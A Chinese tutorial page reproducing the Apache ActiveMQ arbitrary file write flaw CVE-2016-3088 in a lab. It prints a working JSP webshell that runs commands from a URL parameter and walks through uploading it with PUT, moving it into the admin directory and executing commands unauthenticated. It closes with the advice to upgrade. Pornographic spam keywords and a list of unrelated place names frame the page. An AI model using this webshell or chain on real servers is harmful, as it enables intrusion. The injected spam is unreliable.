最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

Apache ActiveMQ任意文件寫入漏洞(CVE-2016-3088)復(fù)現(xiàn)

 更新時(shí)間:2019年08月07日 14:06:44   作者:雨中落葉  
這篇文章主要介紹了Apache ActiveMQ任意文件寫入漏洞(CVE-2016-3088)復(fù)現(xiàn),需要的朋友可以參考下

一、漏洞描述

該漏洞出現(xiàn)在fileserver應(yīng)用中,漏洞原理:ActiveMQ中的fileserver服務(wù)允許用戶通過HTTP PUT方法上傳文件到指定目錄。Fileserver支持寫入文件(不解析jsp),但是支持移動(dòng)文件(Move)我們可以將jsp的文件PUT到Fileserver下,然后再通過Move指令移動(dòng)到可執(zhí)行目錄下訪問。

二、漏洞影響版本

Apache ActiveMQ 5.0.0 - 5.13.2

三、漏洞環(huán)境搭建

1、官網(wǎng)下載apache-activemq-5.7.0-bin.tar 下載地址:http://activemq.apache.org/download-archives.html

2、解壓

3、啟動(dòng),進(jìn)入bin目錄下,運(yùn)行./activemq start

  

4、瀏覽器訪問http://192.168.10.149:8161/,如下圖可以看到成功搭建環(huán)境

  

四、漏洞復(fù)現(xiàn)

1、PUT上傳一個(gè)jsp的webshell到fileserver目錄,下圖可以看到成功上傳jsp文件

Jsp文件內(nèi)容:

<%@ page import="java.io.*"%>
<%
 out.print("Hello</br>");
 String strcmd=request.getParameter("cmd");
 String line=null;
 Process p=Runtime.getRuntime().exec(strcmd);
 BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
 while((line=br.readLine())!=null){
 out.print(line+"</br>");
 }
%>

  

2、瀏覽器訪問http://192.168.10.149:8161/fileserver/1.jsp,下圖可以看到fileserver目錄下的webshell沒有被解析,說明fileserver目錄沒有執(zhí)行權(quán)限

  

3、利用該版本存在物理路徑泄露漏洞,爆一下絕對(duì)路徑

  

4、利用Move方法將webshell移入admin目錄下,如下圖所示成功把文件移入到admin目錄

  

5、利用該版本存在的未授權(quán)訪問漏洞,不用登錄,訪問http://192.168.10.149:8161/admin/1.jsp?cmd=ls,下圖可以看到成功執(zhí)行命令

  

五、漏洞防御

1、ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建議用戶升級(jí)至 5.14.0 及其以后版本。

---------------------------------------------------------------------------------

參考: https://www.secpulse.com/archives/60064.html

總結(jié)

以上所述是小編給大家介紹的Apache ActiveMQ任意文件寫入漏洞(CVE-2016-3088)復(fù)現(xiàn),希望對(duì)大家有所幫助,如果大家有任何疑問請(qǐng)給我留言,小編會(huì)及時(shí)回復(fù)大家的。在此也非常感謝大家對(duì)腳本之家網(wǎng)站的支持!
如果你覺得本文對(duì)你有幫助,歡迎轉(zhuǎn)載,煩請(qǐng)注明出處,謝謝!

相關(guān)文章

  • Linux printf如何將十進(jìn)制轉(zhuǎn)換為十六進(jìn)制

    Linux printf如何將十進(jìn)制轉(zhuǎn)換為十六進(jìn)制

    文章總結(jié):介紹了十進(jìn)制、十六進(jìn)制和八進(jìn)制之間的轉(zhuǎn)換方法,包括使用\b命令和bc工具進(jìn)行轉(zhuǎn)換的技巧
    2024-12-12
  • 使用top命令分析linux系統(tǒng)性能的詳解

    使用top命令分析linux系統(tǒng)性能的詳解

    今天小編就為大家分享一篇關(guān)于使用top命令分析linux系統(tǒng)性能的詳解,小編覺得內(nèi)容挺不錯(cuò)的,現(xiàn)在分享給大家,具有很好的參考價(jià)值,需要的朋友一起跟隨小編來看看吧
    2019-03-03
  • Ubuntu 16.04無法切換root權(quán)限問題的解決

    Ubuntu 16.04無法切換root權(quán)限問題的解決

    root權(quán)限相信對(duì)大家來說都不陌生,下面這篇文章主要給大家介紹了關(guān)于Ubuntu 16.04無法切換root權(quán)限問題的解決方法,文中通過示例代碼介紹的非常詳細(xì),需要的朋友可以參考借鑒,下面隨著小編來一起學(xué)習(xí)學(xué)習(xí)吧。
    2018-04-04
  • linux燒寫、配置、搭建Edison環(huán)境

    linux燒寫、配置、搭建Edison環(huán)境

    本文給大家介紹一下linux上燒寫、配置、搭建Edison環(huán)境的基本流程和需要注意的事項(xiàng),參考一下吧。
    2017-11-11
  • centos7 無線網(wǎng)卡驅(qū)動(dòng)的安裝及無線網(wǎng)絡(luò)的配置詳解

    centos7 無線網(wǎng)卡驅(qū)動(dòng)的安裝及無線網(wǎng)絡(luò)的配置詳解

    本篇文章主要介紹了centos7 無線網(wǎng)卡驅(qū)動(dòng)的安裝及無線網(wǎng)絡(luò)的配置詳解,具有一定的參考價(jià)值,有興趣的可以了解一下。
    2017-03-03
  • Linux下配置jdk環(huán)境的方法

    Linux下配置jdk環(huán)境的方法

    這篇文章主要介紹了Linux下配置jdk環(huán)境的方法,非常不錯(cuò),具有一定的參考借鑒價(jià)值 ,需要的朋友可以參考下
    2019-05-05
  • apache You don''t have permission to access /test.php on this server解決方法

    apache You don''t have permission to access /test.php on thi

    這篇文章主要介紹了apache You don't have permission to access /test.php on this server解決方法,需要的朋友可以參考下
    2015-04-04
  • 可怕的萬圣節(jié) Linux 命令

    可怕的萬圣節(jié) Linux 命令

    crypt 不是一個(gè)地窖,也不是垃圾文件的埋葬坑,而是一個(gè)加密文件內(nèi)容的命令。下面通過本文給大家介紹可怕的萬圣節(jié) Linux 命令,感興趣的朋友跟隨小編一起看看吧
    2018-10-10
  • Linux編譯器--gcc/g++使用方式

    Linux編譯器--gcc/g++使用方式

    文章主要介紹了C/C++程序的編譯過程,包括預(yù)編譯、編譯、匯編和鏈接四個(gè)階段,并詳細(xì)解釋了每個(gè)階段的作用和具體操作,同時(shí),還介紹了調(diào)試和發(fā)布版本的概念
    2025-02-02
  • Linux中hostname修改方法詳解

    Linux中hostname修改方法詳解

    這篇文章主要為大家詳細(xì)介紹了Linux中hostname的修改方法,具有一定的參考價(jià)值,感興趣的小伙伴們可以參考一下
    2017-02-02

最新評(píng)論

安庆市| 建水县| 阳山县| 永德县| 大连市| 鄢陵县| 许昌县| 芜湖市| 铅山县| 黑山县| 玉田县| 开远市| 安化县| 邓州市| 扶余县| 阳曲县| 白河县| 湟源县| 八宿县| 日喀则市| 长治县| 临漳县| 屏山县| 泉州市| 达尔| 思南县| 白山市| 南宁市| 娄烦县| 内黄县| 砚山县| 积石山| 牡丹江市| 怀远县| 勐海县| 新疆| 济源市| 自贡市| 浑源县| 北宁市| 张家川|